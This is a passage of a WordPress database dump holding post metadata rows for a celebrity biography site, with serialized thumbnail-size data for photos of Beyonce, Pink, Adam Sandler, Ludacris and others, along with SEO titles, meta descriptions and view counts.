for.'),(1681,254,'_yoast_wpseo_linkdex','84'),(1682,256,'_edit_lock','1444409779:6'),(1683,256,'_edit_last','6'),(1684,257,'_wp_attached_file','2015/09/Beyonce.jpg'),(1685,257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:558;s:4:\"file\";s:19:\"2015/09/Beyonce.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Beyonce-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Beyonce-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Beyonce-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:17:\"Beyonce-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:18:\"Beyonce-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:19:\"Beyonce-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:19:\"Beyonce-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:19:\"Beyonce-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:19:\"Beyonce-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:19:\"Beyonce-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:19:\"Beyonce-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:19:\"Beyonce-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:19:\"Beyonce-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:19:\"Beyonce-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:19:\"Beyonce-696x485.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:485;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:19:\"Beyonce-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:19:\"Beyonce-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:19:\"Beyonce-602x420.jpg\";s:5:\"width\";i:602;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1686,257,'_wp_attachment_image_alt','Beyonce'),(1687,256,'_thumbnail_id','257'),(1688,256,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1689,256,'slide_template',''),(1690,256,'_yoast_wpseo_focuskw','Beyonce'),(1691,256,'_yoast_wpseo_title','Beyonce Knowles'),(1692,256,'_yoast_wpseo_metadesc','Beyonce is easily one of the most influential, powerful musicians of all time. Learn more about her career, personal life, and what she is most well known for.'),(1693,256,'_yoast_wpseo_linkdex','87'),(1694,256,'post_views_count','230'),(1695,258,'_edit_lock','1444409752:6'),(1696,258,'_edit_last','6'),(1697,259,'_wp_attached_file','2015/09/Michael-Emerson.jpg'),(1698,259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:27:\"2015/09/Michael-Emerson.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Michael-Emerson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Michael-Emerson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-696x465.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Michael-Emerson-629x420.jpg\";s:5:\"width\";i:629;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1699,259,'_wp_attachment_image_alt','Michael Emerson'),(1700,258,'_thumbnail_id','259'),(1701,258,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1702,258,'slide_template',''),(1703,258,'_yoast_wpseo_focuskw','Michael Emerson'),(1704,258,'_yoast_wpseo_title','Michael Emerson'),(1705,258,'_yoast_wpseo_metadesc','Michael Emerson is an American stage and TV actor. Learn more about Emerson, his personal life, career accomplishments, and what he\'s known for.'),(1706,258,'_yoast_wpseo_linkdex','85'),(1707,260,'_edit_lock','1444409549:6'),(1708,260,'_edit_last','6'),(1709,260,'post_views_count','259'),(1710,258,'post_views_count','243'),(1715,260,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1716,260,'slide_template',''),(1717,260,'_yoast_wpseo_metadesc','Pink is one of the most successful female artists and musicians today. Learn more about her, her career accomplishments and personal life.'),(1718,262,'_edit_lock','1444409526:6'),(1719,262,'_edit_last','6'),(1720,263,'_wp_attached_file','2015/09/Pink.jpg'),(1721,263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:16:\"2015/09/Pink.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Pink-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Pink-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:14:\"Pink-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:15:\"Pink-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:16:\"Pink-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:16:\"Pink-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:16:\"Pink-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:16:\"Pink-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:16:\"Pink-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:16:\"Pink-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:16:\"Pink-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:16:\"Pink-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:16:\"Pink-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:16:\"Pink-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:16:\"Pink-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1722,260,'_thumbnail_id','263'),(1723,260,'_yoast_wpseo_focuskw','pink'),(1724,260,'_yoast_wpseo_title','Pink'),(1725,260,'_yoast_wpseo_linkdex','87'),(1726,264,'_wp_attached_file','2015/09/Adam-Sandler.jpg'),(1727,264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:24:\"2015/09/Adam-Sandler.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Adam-Sandler-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Adam-Sandler-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Adam-Sandler-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1728,262,'_thumbnail_id','264'),(1729,262,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1730,262,'slide_template',''),(1731,262,'_yoast_wpseo_focuskw','Sandler'),(1732,262,'_yoast_wpseo_title','Adam Sandler'),(1733,262,'_yoast_wpseo_metadesc','Adam Sandler is one of the best comedic actors of today. Learn more about him, his career accomplishments, what he\'s most well known for and his personal life.'),(1734,262,'_yoast_wpseo_linkdex','80'),(1735,262,'post_views_count','214'),(1736,265,'_edit_lock','1444409472:6'),(1737,265,'_edit_last','6'),(1738,266,'_wp_attached_file','2015/09/Ryan-Phillippe.jpg'),(1739,266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:26:\"2015/09/Ryan-Phillippe.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Ryan-Phillippe-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Ryan-Phillippe-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Ryan-Phillippe-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1740,265,'_thumbnail_id','266'),(1741,265,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1742,265,'slide_template',''),(1743,265,'_yoast_wpseo_focuskw','Ryan Phillippe'),(1744,265,'_yoast_wpseo_title','Ryan Phillippe'),(1745,265,'_yoast_wpseo_metadesc','Ryan Phillippe is a well known American actor, director and writer. Learn more about him, his career accomplishments, and his personal life.'),(1746,265,'_yoast_wpseo_linkdex','82'),(1747,265,'post_views_count','255'),(1748,267,'_edit_lock','1444409270:6'),(1749,267,'_edit_last','6'),(1750,268,'_wp_attached_file','2015/09/Ludacris.jpg'),(1751,268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2015/09/Ludacris.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Ludacris-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Ludacris-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:18:\"Ludacris-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:19:\"Ludacris-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:20:\"Ludacris-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:20:\"Ludacris-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:20:\"Ludacris-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:20:\"Ludacris-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:20:\"Ludacris-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:20:\"Ludacris-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:20:\"Ludacris-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:20:\"Ludacris-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:20:\"Ludacris-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:20:\"Ludacris-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:20:\"Ludacris-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:9:\"U.S. Army\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:71:\"Ludacris performs live for the troops at Fort Meade, Md., Nov. 7, 2010.\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:30:\"Ludacris concert at Fort Meade\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:9:{i:0;s:8:\"Ludacris\";i:1;s:4:\"Army\";i:2;s:6:\"Airmen\";i:3;s:9:\"Air Force\";i:4;s:8:\"Soldiers\";i:5;s:5:\"stage\";i:6;s:7:\"concert\";i:7;s:5:\"music\";i:8;s:4:\"show\";}}}'),(1753,267,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1754,267,'slide_template',''),(1755,267,'_yoast_wpseo_focuskw','Ludacris'),(1756,267,'_yoast_wpseo_title','Ludacris'),(1757,267,'_yoast_wpseo_metadesc','Ludacris is a well known Dirty South Rapper. Learn more about his career accomplishments, early life, what he\'s most known for, and personal life.'),(1758,267,'_yoast_wpseo_linkdex','86'),(1759,269,'_edit_lock','1444409245:6'),(1760,269,'_edit_last','6'),(1761,267,'post_views_count','284'),(1762,267,'_thumbnail_id','268'),(1763,270,'_wp_attached_file','2015/09/Amy-Winehouse.jpg'),(1764,270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:25:\"2015/09/Amy-Winehouse.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Amy-Winehouse-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Amy-Winehouse-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Amy-Winehouse-265x198.jpg\";s:5:\"width\";i:265;s:6:\"